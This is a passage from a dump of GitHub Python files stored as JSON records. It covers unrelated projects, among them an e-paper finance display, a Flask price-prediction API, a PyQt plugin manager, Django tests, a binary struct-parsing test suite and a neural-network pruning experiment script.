float(finance['hq_str_gb_ixic'][2])), (image_width/2, 280))\n\n draw_finance(draw, (u'上证指数', float(finance['hq_str_s_sh000001'][1]), float(finance['hq_str_s_sh000001'][3])), (20, 310))\n draw_finance(draw, (u'深证成指', float(finance['hq_str_s_sz399001'][1]), float(finance['hq_str_s_sz399001'][3])), (image_width/2, 310))\n\n c = float(finance['hq_str_USDCNY'][8])\n o = float(finance['hq_str_USDCNY'][3])\n draw_finance(draw, (u'美元兑人民币', c, (c-o)/o*100), (20, 340))\n\n return image\n\ndef convert_image(im, output_path):\n output_fp = open(output_path, \"w\")\n\n w, h = im.size\n size = w*h\n\n i = 0\n while i < size:\n b = 0x00\n\n for j in xrange(4):\n idx = i + j\n if idx < size:\n px = im.getpixel((idx%w, idx/w))\n if px[0] > 230 and px[1] > 230 and px[2] > 230: #white\n b |= 0x01 << ((3 - j)*2)\n elif px[0] > 200:\n b |= 0x02 << ((3 - j)*2)\n else:\n break\n\n output_fp.write(struct.pack(\"B\", b))\n\n i += 4\n\n\n\nif __name__ == '__main__':\n image = draw_board()\n #image.save(\"./board.bmp\")\n convert_image(image, sys.argv[1])\n","repo_name":"emptyhua/epaper_board","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
+{"seq_id":"35834921429","text":"import os\n\nfrom dotenv import load_dotenv\n\nfrom bot_app import screenshots\n\ndotenv_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), '.env')\n\nif os.path.exists(dotenv_path):\n load_dotenv(dotenv_path)\n\nBOT_TOKEN = os.environ.get('BOT_TOKEN', '')\n\nSPLASH_PORT = os.environ.get('SPLASH_PORT', '8050')\n\nSAVE_PATH = screenshots.get_dir_path()\n\nFULL_PAGE = 1\n","repo_name":"Iftor/screenshoter-bot","sub_path":"bot_app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"538702366","text":"# Importando as bibliotecas\nfrom flask import Flask, request, render_template\nfrom flask_restful import Api\nfrom joblib import load\n\n# Iniciando o Flask e especificando o repositorio dos templates\napp = Flask(__name__, template_folder=\"template\")\n\nimport preprocessamento\n\n# Iniciando a API\napi = Api(app)\n\n# Carregando os modelos treinados\nmodelo_aluguel = load('modelo_alugueis.joblib')\nmodelo_venda = load('modelo_vendas.joblib')\n\n# Rota padrão para home\n@app.route('/')\ndef home():\n return render_template('home.html') # Rendezirar o template\n\n# Rota 'predict' aceita GET request\n@app.route('/predict', methods=['GET'])\ndef predict_price():\n try:\n negotiation_type = int(request.args.get('negotiation_type')) # Obter os parâmetros para Negotiation_Type\n condo = int(request.args.get('condo')) # Obter os parâmetros para Condo\n size = int(request.args.get('size')) # Obter os parâmetros para Size\n rooms = int(request.args.get('rooms')) # Obter os parâmetros para Rooms\n toilets = int(request.args.get('toilets')) # Obter os parâmetros para Toilets\n suites = int(request.args.get('suites')) # Obter os parâmetros para Suites\n parking = int(request.args.get('parking')) # Obter os parâmetros para Parking\n elevator = int(request.args.get('elevator')) # Obter os parâmetros para Elevator\n furnished = int(request.args.get('furnished')) # Obter os parâmetros para Furnished\n swimming_pool = int(request.args.get('swimming_pool')) # Obter os parâmetros para Swimming_Pool\n new = int(request.args.get('new')) # Obter os parâmetros para New\n bairro = request.args.get('bairro') # Obter os parâmetros para Bairro\n\n bairros_sem_aluguel = ['District_Perus', 'District_São Domingos']\n\n # Separando os modelos para aluguel e venda\n if negotiation_type == 0:\n if bairro in bairros_sem_aluguel:\n previsao = 'O bairro informado não possui nenhuma informação no banco de dados referente ao preço de ' \\\n 'aluguel.'\n return render_template('output2.html', previsao=previsao)\n else:\n # Obtendo a previsão\n previsao = modelo_aluguel.predict(preprocessamento.tratamento(negotiation_type, condo, size, rooms,\n toilets, suites, parking, elevator,\n furnished, swimming_pool, new, bairro))\n # Exibindo a previsão na página web output\n return render_template('output.html', previsao=previsao)\n\n elif negotiation_type == 1:\n # Obtendo a previsão\n previsao = round(modelo_venda.predict(preprocessamento.tratamento(negotiation_type, condo, size, rooms,\n toilets, suites, parking, elevator,\n furnished, swimming_pool, new, bairro)))\n # Exibindo a previsão na página web output\n return render_template('output.html', previsao=previsao)\n except:\n 'Error'\n\n# Executar o servidor Flask\nif(__name__== '__main__'):\n app.run()\n","repo_name":"octavianosilva/API_Apartamentos_SP","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"34838305943","text":"\"\"\" A simple web browser \"\"\"\r\n\r\nimport socket\r\n# print(help(socket))\r\n\r\nmy_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nmy_sock.connect((\"data.pr4e.org\", 80))\r\n\r\nreq = \"GET http://data.pr4e.org/romeo.txt HTTP/1.0\\r\\n\\r\\n\"\r\nreq_encoded = req.encode()\r\nmy_sock.send(req_encoded)\r\n\r\nwhile True:\r\n data = my_sock.recv(512)\r\n if len(data) < 1:\r\n break\r\n print(data.decode())\r\n\r\nmy_sock.close()\r\n","repo_name":"danielOuattara/Python_For_EveryBody_py4e_Charles_Severance","sub_path":"13_Python_Network/script_03_using_http.py","file_name":"script_03_using_http.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"31849950045","text":"import os\nimport shutil\nimport sys\n\nfrom PyQt6 import QtWidgets, QtGui, QtCore\nfrom pathlib import Path\nfrom .control_plugin_collection import PluginCollection\n\n\nclass PluginManager(object):\n def __init__(self, main_control):\n super().__init__()\n self.main_control = main_control\n self.plugin = PluginCollection(\"plugins\")\n self.apps_activated = None\n self.index = None\n self.init_available_plugin()\n self.connect_to_event()\n\n def connect_to_event(self):\n self.main_control.ui.add_plugins_button.clicked.connect(self.install_new_plugin)\n self.main_control.ui.delete_plugins_button.clicked.connect(self.action_delete_apps)\n self.main_control.ui.close_plugin_button.clicked.connect(self.main_control.back_to_home)\n self.main_control.ui.help_plugins_button.clicked.connect(self.help_menu_plugin)\n\n def init_available_plugin(self):\n for i in range(self.main_control.ui.layout_application.count()):\n self.main_control.ui.layout_application.itemAt(i).widget().close()\n\n for i in range(len(self.plugin.name_application)):\n icon = self.plugin.get_icon_(i)\n button = self.add_btn_apps_plugin(icon, self.plugin.name_application[i])\n button.clicked.connect(self.open_plugin_apps)\n self.main_control.ui.layout_application.addWidget(button)\n\n def install_new_plugin(self):\n options = QtWidgets.QFileDialog.Option.DontUseNativeDialog\n dir_plugin = QtWidgets.QFileDialog.getExistingDirectory(None,\n 'Select Application Folder', \"../plugin_store\", options)\n if dir_plugin:\n original = dir_plugin\n name_plug = os.path.basename(os.path.normpath(original))\n path_file = os.path.dirname(os.path.realpath(__file__))\n target = path_file + '/plugins/'\n name_exist = Path(target + name_plug)\n if name_exist.exists():\n QtWidgets.QMessageBox.warning(None, \"Warning !!\", \"Plugins already exist!!\")\n else:\n listApp = self.plugin.name_application\n self.main_control.model.copy_directory(original, target)\n self.plugin.reload_plugins()\n newList = self.plugin.name_application\n name = [item for item in newList if item not in listApp]\n\n def listToString(listIn):\n return \" \".join(listIn)\n\n index = newList.index(listToString(name))\n icon = self.plugin.get_icon_(index)\n button = self.add_btn_apps_plugin(icon, self.plugin.name_application[index])\n button.clicked.connect(self.open_plugin_apps)\n self.main_control.ui.layout_application.addWidget(button)\n self.pop_up_message_box(\"Plugins was successfully added!!\")\n\n def refresh_theme_widget(self):\n if self.index is not None:\n self.plugin.change_theme(self.index)\n\n def open_plugin_apps(self):\n button = self.main_control.sender()\n index = self.plugin.name_application.index(button.objectName())\n if index != self.index:\n self.index = self.plugin.name_application.index(button.objectName())\n self.main_control.ui.delete_plugins_button.show()\n self.main_control.ui.close_plugin_button.show()\n for i in range(self.main_control.ui.layout_plugin.count()):\n self.main_control.ui.layout_plugin.itemAt(i).widget().close()\n\n widget = self.plugin.get_widget(self.index, self.main_control.model)\n self.main_control.ui.layout_plugin.addWidget(widget)\n self.main_control.ui.widget_container_content.setCurrentIndex(1)\n self.main_control.ui.frame_btn_moilapp.hide()\n self.main_control.ui.frame_button_view.hide()\n self.apps_activated = button.objectName()\n\n @classmethod\n def add_btn_apps_plugin(cls, icon_, name):\n button = QtWidgets.QPushButton()\n button.setObjectName(name)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Policy.Minimum, QtWidgets.QSizePolicy.Policy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(button.sizePolicy().hasHeightForWidth())\n button.setSizePolicy(sizePolicy)\n button.setMinimumSize(QtCore.QSize(40, 25))\n button.setMaximumSize(QtCore.QSize(35, 16777215))\n if icon_ is not None:\n icon = QtGui.QIcon(icon_)\n button.setIcon(icon)\n button.setIconSize(QtCore.QSize(30, 30))\n return button\n\n def action_delete_apps(self):\n index = self.plugin.name_application.index(self.apps_activated)\n self.delete_apps(index)\n\n def delete_apps(self, index):\n \"\"\"\n Delete selected application from the list.\n\n Returns:\n None.\n \"\"\"\n name = self.plugin.name_application[index]\n path = self.plugin.path_folder[index]\n path = path.split(\".\")[1]\n\n path_file = os.path.dirname(os.path.realpath(__file__))\n path = path_file + '/plugins/'+path\n\n reply = QtWidgets.QMessageBox.question(None, 'Message',\n \"Are you sure want to delete \\n\" +\n name + \" application ?\\n\",\n QtWidgets.QMessageBox.StandardButton.Yes |\n QtWidgets.QMessageBox.StandardButton.No,\n QtWidgets.QMessageBox.StandardButton.No)\n\n if reply == QtWidgets.QMessageBox.StandardButton.Yes:\n shutil.rmtree(path, ignore_errors=True)\n self.plugin.reload_plugins()\n self.init_available_plugin()\n self.pop_up_message_box(\"Plugins was successfully deleted !!\")\n self.main_control.back_to_home()\n\n def help_menu_plugin(self):\n if self.main_control.ui.widget_container_content.currentIndex() == 0:\n message = \"Help menu plugin under development \\n\" \\\n \"we Will inform you after finish!!\\n\"\n\n else:\n print(self.plugin.get_description(self.index))\n message = \"Help menu plugin under development \\n\" \\\n \"we Will inform you after finish!!\\n\\n\" \\\n \"Note App: \" + self.plugin.get_description(self.index)\n self.pop_up_message_box(message)\n\n @classmethod\n def pop_up_message_box(cls, message=\"\"):\n msg = QtWidgets.QMessageBox()\n msg.setIcon(QtWidgets.QMessageBox.Icon.Information)\n msg.setStyleSheet(\"font-family: Segoe UI; font-size:14px;\")\n msg.setWindowTitle(\"Information\")\n # setting message for Message Box\n msg.setText(\"Information !! \\n\\n\" + message)\n msg.setStandardButtons(QtWidgets.QMessageBox.StandardButton.Ok)\n msg.show()\n\n def close_msg():\n msg.done(0)\n\n QtCore.QTimer.singleShot(6000, close_msg)\n","repo_name":"Herusyahputra/PycharmProjects","sub_path":"moilapp-develop_anto/src/controllers/control_plugin_manager.py","file_name":"control_plugin_manager.py","file_ext":"py","file_size_in_byte":7154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"32523824634","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom mixer.backend.django import mixer\nimport json\nfrom accomplishment.forms import AccomplishmentFormMixin\nfrom accomplishment.models import Accomplishment, UserAccomplishment\nfrom django.urls import reverse_lazy\nfrom subject_area.models import SubjectArea, Category\nfrom rest_framework.authtoken.models import Token\n\n\nclass AccomplishmentTestCase(TestCase):\n def setUp(self):\n self.session_user = mixer.blend(User)\n self.client.force_login(self.session_user)\n self.token = Token.objects.create(user=self.session_user).key\n self.client.defaults['HTTP_AUTHORIZATION'] = 'Token ' + self.token\n profile = self.session_user.profile\n profile.device_token = \"somedevicetoken\"\n profile.save()\n\n def test_accomplishment_creation(self):\n accomplishments_count = Accomplishment.objects.count()\n subject_areas = [instance for instance in mixer.cycle(2).blend(SubjectArea)]\n categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n category_ids = [category.id for category in categories]\n\n subject_areas[0].category_set.add(categories[0])\n subject_areas[1].category_set.add(categories[1])\n\n users = mixer.cycle(2).blend(User)\n\n i = 0\n\n for user in users:\n print(f\"whaaat: {subject_areas[i].id}\")\n user.profile.subject_area = subject_areas[i]\n user.save()\n user.profile.save()\n i += 1\n\n print(f\"hey 2: {user.profile.subject_area}\")\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, name=\"test\", full_score=100).__dict__\n data = {**data, \"categories\": category_ids}\n\n response = self.client.post(reverse_lazy(\"accomplishment:list\"), data)\n print(response.content)\n\n accomplishment = Accomplishment.objects.first()\n\n print(f\"yeso: {SubjectArea.objects.all()}\")\n print(f\"yeso 2: {Category.objects.all()}\")\n print(f\"yeso 3: {User.objects.all()}\")\n print(f\"yeso 4: {UserAccomplishment.objects.all()}\")\n\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Accomplishment.objects.count(), accomplishments_count+1)\n self.assertEqual(len(users), accomplishment.users.all().count())\n # self.assertEqual(len(subject_areas), accomplishment.subject_areas.all().count())\n\n users_after_accomplishment_creation = mixer.cycle(2).blend(User)\n\n subject_area_after_accomplishment_creation = mixer.blend(SubjectArea)\n\n category_after_accomplishment_creation = mixer.blend(\n Category, subject_area=subject_area_after_accomplishment_creation)\n\n accomplishment.categories.add(category_after_accomplishment_creation)\n\n i = 0\n for user in users_after_accomplishment_creation:\n user.profile.subject_area = subject_area_after_accomplishment_creation\n user.save()\n i += 1\n\n accomplishment.refresh_from_db()\n\n self.assertEqual(len(users)+len(users_after_accomplishment_creation), accomplishment.users.all().count())\n\n def test_accomplishment_edition(self):\n full_score = 3\n instance = self.create_accomplishment(full_score=full_score)\n subject_areas = instance.subject_areas.all()\n categories = instance.categories.all()\n accomplishment_users = set(instance.users.values_list(\"pk\", flat=True))\n\n with mixer.ctx(commit=False):\n new_data = mixer.blend(Accomplishment).__dict__\n new_data = {**new_data, \"categories\": [category.pk for category in categories]}\n\n response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n self.assertEqual(response.status_code, 302)\n\n instance.refresh_from_db()\n\n self.assertEqual(instance.name, new_data.get(\"name\"))\n self.assertEqual(instance.categories.all().count(), categories.count())\n self.assertEqual(set(instance.users.values_list(\"pk\", flat=True)), accomplishment_users)\n\n # test changing of subject_areas\n\n new_subject_areas = [subject_area for subject_area in mixer.cycle(3).blend(SubjectArea)]\n\n i = 0\n\n new_categories = [category for category in mixer.cycle(3).blend(Category)]\n\n for new_subject_area in new_subject_areas:\n new_categories[i].subject_area = new_subject_area\n new_categories[i].save()\n\n new_data[\"categories\"] = [new_category.pk for new_category in new_categories]\n\n new_users = mixer.cycle(3).blend(User)\n\n i = 0\n for user in new_users:\n user.profile.subject_area = new_subject_areas[i]\n user.save()\n user.profile.save()\n i += 1\n\n response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n self.assertEqual(response.status_code, 302)\n print(f\"?????? {accomplishment_users}\")\n old_user = next(iter(accomplishment_users))\n response = self.client.get(reverse_lazy(\"api_accomplishment:accomplishment-detail\",\n kwargs={\"accomplishment_id\": instance.pk,\n \"user_id\": old_user}))\n\n # hier darf der Nutzer nicht mehr auftauchen, da er nicht mehr zur Fachrichtung dazu gehört\n\n self.assertEqual(response.status_code, 404, f\"{json.loads(response.content)}\")\n\n instance.refresh_from_db()\n\n self.assertEqual(len(new_subject_areas), SubjectArea.objects.filter(\n category__in=instance.categories.all()).count())\n self.assertNotEqual(set(instance.users.values_list(\"pk\", flat=True)), accomplishment_users)\n\n # example user must be user from subject_area because non-subject-areas aren't listed on endpoint\n\n example_user = instance.categories.first().subject_area.profiles.first().user\n\n for i in range(0, full_score):\n response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n kwargs={\"user_id\": example_user.id, \"accomplishment_id\": instance.id})\n )\n self.assertEqual(response.status_code, 200)\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(json.loads(response.content).get(\"score\"), full_score)\n instance.refresh_from_db()\n\n new_full_score = 1\n new_data[\"full_score\"] = new_full_score\n\n response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n\n self.assertEqual(response.status_code, 302)\n\n instance.refresh_from_db()\n\n self.assertEqual(instance.full_score, new_full_score)\n\n def test_incrementation_and_decrementation_of_users_accomplishment_score(self):\n full_score = 3\n accomplishment = self.create_accomplishment(full_score=full_score)\n user = accomplishment.users.first()\n\n response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(json_response.get(\"score\"), 0)\n\n for i in range(0, full_score):\n self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n )\n response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(json_response.get(\"score\"), full_score)\n\n response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n )\n\n self.assertEqual(response.status_code, 400)\n\n for i in range(0, full_score):\n self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-decrementation\",\n kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n )\n\n response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(json_response.get(\"score\"), 0)\n\n response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-decrementation\",\n kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n )\n\n self.assertEqual(response.status_code, 400)\n\n def create_accomplishment(self, full_score=1):\n subject_areas = [instance for instance in mixer.cycle(2).blend(SubjectArea)]\n categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n category_ids = [instance.pk for instance in categories]\n\n categories[0].subject_area = subject_areas[0]\n categories[1].subject_area = subject_areas[1]\n\n categories[0].save()\n categories[1].save()\n\n users = mixer.cycle(2).blend(User)\n\n i = 0\n for user in users:\n user.profile.subject_area = subject_areas[i]\n user.save()\n user.profile.save()\n i += 1\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, full_score=full_score).__dict__\n data = {**data, \"categories\": category_ids}\n\n form = AccomplishmentFormMixin(data=data)\n instance = form.save()\n print(f\"....----....----.... {instance.users.all()}\")\n return instance\n\n def fetch_user_accomplishment(self, user_id, accomplishment_id):\n response = self.client.get(\n reverse_lazy(\"api_accomplishment:accomplishment-detail\",\n kwargs={\"user_id\": user_id, \"accomplishment_id\": accomplishment_id}))\n json_response = json.loads(response.content)\n return response, json_response\n\n def test_accomplishment_badges(self):\n self.assertEqual(self.session_user.profile.accomplishment_badges, 0)\n subject_area = mixer.blend(SubjectArea)\n categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n category_ids = [category.id for category in categories]\n\n subject_area.category_set.add(categories[0])\n subject_area.category_set.add(categories[1])\n\n profile = self.session_user.profile\n profile.subject_area = subject_area\n profile.save()\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, name=mixer.RANDOM, full_score=100).__dict__\n data = {**data, \"categories\": category_ids}\n\n response = self.client.post(reverse_lazy(\"accomplishment:list\"), data)\n self.assertEqual(response.status_code, 302)\n self.session_user.profile.refresh_from_db()\n self.assertEqual(self.session_user.profile.accomplishment_badges, 1)\n","repo_name":"memobijou/clinic-app","sub_path":"accomplishment/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"20748457251","text":"import cv2\nimport numpy as np\n\n\nimg_dir = 'C:\\\\D\\\\testImgs\\\\'\nimg = cv2.imread(img_dir + 'aa.jpg')\nkernel = np.array([[0.299, 0.587, 0.114], [- 0.1687, 0.3313, 0.5], [0.5, 0.4187, 0.0813]])\n# 就是矩阵相乘:yuv = kernel * img, 针对每一个像素的rgb\nyuv = cv2.transform(img, kernel)\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ncv2.imshow('original', img)\ncv2.imshow('y', yuv[:, :, 0])\ncv2.imshow('gray', gray)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"kingtub/OpencvExercise","sub_path":"opencv-python-book/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73797074284","text":"import pytest\nfrom dissect import cstruct\n\nfrom dissect.cstruct.types import PackedType\n\nfrom .utils import verify_compiled\n\n\ndef test_packedtype_float():\n cs = cstruct.cstruct()\n\n assert cs.float16.dumps(420.69) == b\"\\x93^\"\n assert cs.float.dumps(31337.6969) == b\"e\\xd3\\xf4F\"\n assert cs.float16.reads(b\"\\x69\\x69\") == 2770.0\n assert cs.float.reads(b\"M0MS\") == 881278648320.0\n\n\ndef test_packedtype_float_struct(compiled):\n cdef = \"\"\"\n struct test {\n float16 a;\n float b;\n };\n \"\"\"\n cs = cstruct.cstruct()\n cs.load(cdef, compiled=compiled)\n\n assert verify_compiled(cs.test, compiled)\n\n buf = b\"69\\xb1U$G\"\n obj = cs.test(buf)\n\n assert obj.a == 0.6513671875\n assert obj.b == 42069.69140625\n\n\ndef test_packedtype_float_struct_be(compiled):\n cdef = \"\"\"\n struct test {\n float16 a;\n float b;\n };\n \"\"\"\n cs = cstruct.cstruct()\n cs.load(cdef, compiled=compiled)\n cs.endian = \">\"\n\n assert verify_compiled(cs.test, compiled)\n\n buf = b\"69G$U\\xb1\"\n obj = cs.test(buf)\n print(obj)\n\n assert obj.a == 0.388916015625\n assert obj.b == 42069.69140625\n\n\ndef test_packedtype_range():\n cs = cstruct.cstruct()\n float16 = PackedType(cs, \"float16\", 2, \"e\")\n float16.dumps(-65519.999999999996)\n float16.dumps(65519.999999999996)\n with pytest.raises(OverflowError):\n float16.dumps(-65519.999999999997)\n with pytest.raises(OverflowError):\n float16.dumps(65519.999999999997)\n","repo_name":"fox-it/dissect.cstruct","sub_path":"tests/test_packedtype.py","file_name":"test_packedtype.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"19"}
+{"seq_id":"8451598305","text":"from collections import OrderedDict\nimport copy\nfrom intrafusion_test import wrapper_intra_fusion\nfrom fusion_utils_IF import MetaPruneType, PruneType\nfrom pruning_modified import prune_structured, prune_structured_intra\nfrom performance_tester import train_during_pruning, update_running_statistics\nfrom parameters import get_parameters\nfrom train import get_model\nimport torch\nfrom fusion import MSF, IntraFusion_Clustering, fusion, fusion_bn, fusion_old, fusion_sidak_multimodel, fusion_bn_alt, intrafusion_bn\nfrom sklearn.model_selection import train_test_split\nfrom torchvision.transforms import ToTensor\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nfrom torch import optim\nfrom torch.autograd import Variable\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nfrom models import get_pretrained_models\nimport json\nimport re\n\n\ndef get_cifar_data_loader(shuffle=True):\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root='./data', train=True, transform=transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32, 4),\n transforms.ToTensor(),\n normalize,\n ]), download=True),\n batch_size=128, shuffle=shuffle,\n num_workers=4, pin_memory=True)\n\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root='./data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=128, shuffle=False,\n num_workers=4, pin_memory=True)\n \n return {\n \"train\" : train_loader,\n \"test\" : val_loader\n }\n\n\ndef evaluate_performance_simple(input_model, loaders, gpu_id, eval=True):\n '''\n Computes the accuracy of a given model (input_model) on a given dataset (loaders[\"test\"]).\n '''\n if gpu_id != -1:\n input_model = input_model.cuda(gpu_id)\n \n if eval:\n input_model.eval()\n\n accuracy_accumulated = 0\n total = 0\n with torch.no_grad():\n for images, labels in loaders['test']:\n if gpu_id != -1:\n images, labels = images.cuda(), labels.cuda()\n \n test_output = input_model(images)\n\n pred_y = torch.max(test_output, 1)[1].data.squeeze()\n accuracy = (pred_y == labels).sum().item() / float(labels.size(0))\n accuracy_accumulated += accuracy \n total += 1\n input_model.cpu()\n return accuracy_accumulated / total\n\n\ndef get_data_loader(shuffle=True):\n test_data = datasets.MNIST(\n root = 'data', \n train = False, \n transform = ToTensor()\n ) \n\n train_data = datasets.MNIST(\n root = 'data', \n train = True, \n transform = ToTensor()\n ) \n\n # 2. defining the data loader for train and test set using the downloaded MNIST data\n loaders = { \n 'test' : torch.utils.data.DataLoader(test_data, \n batch_size=100, \n shuffle=shuffle, \n num_workers=1),\n \"train\": torch.utils.data.DataLoader(train_data, \n batch_size=100, \n shuffle=shuffle, \n num_workers=1)\n }\n return loaders\n\n\ndef test(model, loaders, args):\n model.eval()\n\n accuracy_accumulated = 0\n total = 0\n with torch.no_grad():\n for images, labels in loaders['test']:\n if args.gpu_id != -1:\n images, labels = images.cuda(), labels.cuda()\n test_output,_ = model(images)\n pred_y = torch.max(test_output, 1)[1].data.squeeze()\n accuracy = (pred_y == labels).sum().item() / float(labels.size(0))\n accuracy_accumulated += accuracy \n total += 1\n return accuracy_accumulated / total\n\n\nif __name__ == '__main__':\n args = get_parameters()\n num_models = args.num_models\n dict = {}\n it = 9\n\n models = get_pretrained_models(args.model_name, \"resnet50_diff_weight_init_True_cifar10\", args.gpu_id, num_models, output_dim=10)\n\n loaders = None\n if \"vgg\" not in args.model_name and \"resnet\" not in args.model_name:\n print(\"Went in here!!!\")\n loaders = get_data_loader()\n else:\n print(\"Got cifar\")\n loaders = get_cifar_data_loader()\n\n \n \"\"\"accuracies = []\n\n result = {}\n sparsities = [0.1, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9]\n result[\"prune\"] = {}\n result[\"IF\"] = {}\n prune_type = \"l1\"\n for sparsity in sparsities:\n print(\"----------\")\n t = prune_structured(net=copy.deepcopy(models[0]), loaders=None, prune_iter_epochs=0, gpu_id=args.gpu_id, example_inputs=torch.randn(1, 3, 32, 32),\n out_features=10, prune_type=prune_type, sparsity=sparsity, train_fct=None, prune_iter_steps=1)\n result[\"prune\"][sparsity] = evaluate_performance_simple(t, loaders, 0, eval=True)\n print(result[\"prune\"][sparsity])\n\n fused_model_g = wrapper_intra_fusion(model=models[0], model_name = args.model_name, resnet=False, sparsity=sparsity, prune_iter_steps=0, num_epochs=0, loaders=None, prune_type=\"l1\", meta_prune_type=MetaPruneType.IF, gpu_id=0)\n #fused_model_g = intrafusion_bn(models[0], full_model = models[0], meta_prune_type = MetaPruneType.IF, prune_type=prune_type, model_name=args.model_name, sparsity=sparsity, fusion_type=\"weight\", gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n result[\"IF\"][sparsity] = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print(result[\"IF\"][sparsity])\n print(\"--------------\")\n with open(f\"results_datafree_resnet18_{prune_type}.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n exit()\"\"\"\n\n\n for idx, ((layer0_name, fc_layer0_weight), (layer1_name, fc_layer1_weight)) in \\\n enumerate(zip(models[0].named_parameters(), models[0].named_parameters())):\n print(f\"{layer0_name} : {fc_layer0_weight.shape}\")\n\n\n fused_model_g = fusion_bn(models, model_name = args.model_name, fusion_type=\"activation\", gpu_id=-1, resnet=True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n #fused_model_g = wrapper_intra_fusion(model=models[0], model_name=args.model_name, resnet=True, sparsity=0.1, prune_iter_steps=0, num_epochs=0, loaders=loaders, prune_type=PruneType.L2, meta_prune_type=MetaPruneType.IF, gpu_id=0)\n #fused_model_g = fusion(models, gpu_id=args.gpu_id, resnet=True)\n print(evaluate_performance_simple(fused_model_g, loaders, 0, eval=True))\n exit()\n \"\"\"fused_model_g = intrafusion_bn(models[0], full_model = models[0], sparsity=0.9, fusion_type=\"weight\", gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n print(evaluate_performance_simple(fused_model_g, loaders, 0, eval=True))\n exit()\"\"\"\n\n\n result = {}\n\n train_epochs = 10\n sparsities = [0.9]\n total_steps = 5\n for idx, model in enumerate(models):\n result[f\"model_{idx}\"] = {}\n for sparsity in sparsities:\n print(\"****************Sparsity: \", sparsity)\n \"\"\"prune_steps = prune_structured_intra(net=copy.deepcopy(model), loaders=None, num_epochs=0, gpu_id=args.gpu_id, example_inputs=torch.randn(1, 3, 32, 32),\n out_features=10, prune_type=\"l1\", sparsity=sparsity, train_fct=None, total_steps=total_steps)\n fused_model_g = model\n for prune_step in prune_steps:\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=sparsity, fusion_type=\"weight\", full_model = model, small_model=prune_step, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n fused_model_g,_ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=train_epochs, gpu_id =0, prune=False, performed_epochs=0)\"\"\"\n fused_model_g = 